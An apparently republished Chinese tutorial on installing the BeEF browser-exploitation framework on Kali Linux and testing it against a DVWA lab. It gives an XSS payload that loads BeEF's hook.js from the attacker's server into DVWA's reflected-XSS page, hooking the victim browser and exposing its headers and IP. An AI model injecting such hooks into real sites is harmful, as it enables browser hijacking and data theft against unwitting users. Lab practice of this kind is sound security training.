在kali环境下安装Beef-Xss靶场搭建

这篇具有很好参考价值的文章主要介绍了在kali环境下安装Beef-Xss靶场搭建。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、更新安装包

二、安装beef-xss

三、启动Beef-Xss工具

1、查看hook.js

2、查看后台登录地址

3、查看用户名和登录密码

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中


一、更新安装包

┌──(root㉿kali)-[/home/kali]
└─# apt-get update  

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

 二、安装beef-xss

┌──(root㉿kali)-[/home/kali]
└─# apt-get install beef-xss

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

三、启动Beef-Xss工具

第一次启动会提示你需要输入密码

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

1、查看hook.js

http://192.168.17.130:3000/hook.js

可见代码之复杂,功能之多

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

2、查看后台登录地址

http://192.168.17.130:3000/ui/authentication

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

3、查看用户名和登录密码

┌──(root㉿kali)-[/home/kali]
└─# cd /usr/share/beef-xss
                                                                                                                                 
┌──(root㉿kali)-[/usr/share/beef-xss]
└─# ls -al

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建
 

┌──(root㉿kali)-[/usr/share/beef-xss]
└─# vim /etc/beef-xss/config.yaml

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

 4、登录页面

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

5、点击 Hook me:将配置的页面导入BEEF中

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

在DVWA的反射型XSS中注入BEEF配置页面hook.js

<script src="//192.168.17.130:3000/hook.js">

提交后:

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

此时BEEF中监控已经上线:

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

可获取http请求头,服务器类型,IP地址等信息

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建

攻击连接意图:

在kali环境下安装Beef-Xss靶场搭建,网络渗透防御,xss,Beef-xss,环境搭建文章来源地址https://www.toymoban.com/news/detail-690834.html

到了这里,关于在kali环境下安装Beef-Xss靶场搭建的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali+docker搭建Vulfocus靶场并配置vulfocus漏洞环境

    好吧,上次更新博客也不记得是几年前的事情了,来说说消失的这段时间我在干嘛。最近超级无敌忙,每天送餐从早送到晚,同时兼职某团和饿了某,现在正在给一个靓女送杯奶茶,做安服税后5千块钱的工资能干嘛?赶紧和我一起做某团骑手,少走30年弯路。 难得有空,最近

    2024年02月05日
    浏览(47)
  • Kali安装Docker并简单搭建漏洞靶场vulhub

    Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux机器或Windows 机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口。还可以帮助安全人员进行靶场的搭建。 在kali上,先确定

    2024年02月15日
    浏览(44)
  • Kali搭建DVWA——Web靶场

    ▣ 博主主站地址:微笑涛声 【www.cztcms.cn】 1、DVWA简介 DVWA 是一款基于 PHP 和 MYSQL 开发的 web靶场 练习平台,集成了常见的web漏洞如 sql注入 , XSS , 密码破解 等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防

    2024年02月04日
    浏览(35)
  • web靶场——xss-labs靶机平台的搭建和代码审计

    目录 一、web靶场-xss-labs靶机平台的搭建 1、将下载好的压缩包放置php的WWW根目录下 2、配置网站 3、启动MYSQL和Nginx 4、完成后我们就可以在浏览器输入127.0.0.1:8088进入靶场 二、xss-labs靶场通关攻略 第一关: 1、输入代码进行测试:源代码 我们直接将参数插入标题试一试 第二关

    2024年02月04日
    浏览(51)
  • 【网络安全 --- xss-labs靶场通关(1-10关)】详细的xss-labs靶场通关思路及技巧讲解,让你对xss漏洞的理解更深刻

    靶场安装请参考以下博客,既详细有提供工具: 【网络安全 --- xss-labs靶场】xss-labs靶场安装详细教程,让你巩固对xss漏洞的理解及绕过技巧和方法(提供资源)-CSDN博客 【网络安全 --- xss-labs通关】xss-labs靶场通关,让你巩固对xss漏洞的理解及绕过技巧和方法(提供资源) h

    2024年02月08日
    浏览(46)
  • Kali Linux搭建DVWA漏洞靶场(全过程)

    1、搭建好kali Linux虚拟机,可以看我前面发布的文章 2、有DVWA-master压缩包,可以看我前面的文章,里面含有DVWA-master压缩包 目  录 一、开启Apache、mysql服务 1.1  下载Apache2文件 1.2 开启Apache2服务  1.3 开启mysql服务 1.4 验证Apache2服务是否成功开启 二、解压并安装DVWA环境 2.1 压缩

    2024年02月11日
    浏览(36)
  • 解决kali beef启动失败解问题

    只限于出现这个提示的时候使用 卸载 ruby apt remove ruby 卸载 beef apt remove beef-xss 重新安装ruby apt-get install ruby apt-get install ruby-dev libpcap-dev gem install eventmachine 重新安装beef apt-get install beef-xss 弄完以上步骤如果还是不行就重启kali再试试  

    2024年01月17日
    浏览(42)
  • XSS攻击:利用Beef劫持被攻击者客户端浏览器

    实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法 系统环境:Kali Linux 2、Windows Server 网络环境:交换网络结构 实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner) 实验步骤: 实验环境搭建。 角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建) 攻击者

    2024年02月03日
    浏览(48)
  • [网络安全]XSS之Cookie外带攻击姿势及例题详析(基于DVWA靶场)

    本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而 窃取用户的 Cookie 信息 。 在使用XSS语

    2024年02月08日
    浏览(51)
  • 网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

    目录 一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用 二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化 (1)主机 表1  主机 系统 版本 IP 备注 Kali Linux 2022.4 192.168.204.154(动态

    2024年04月26日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包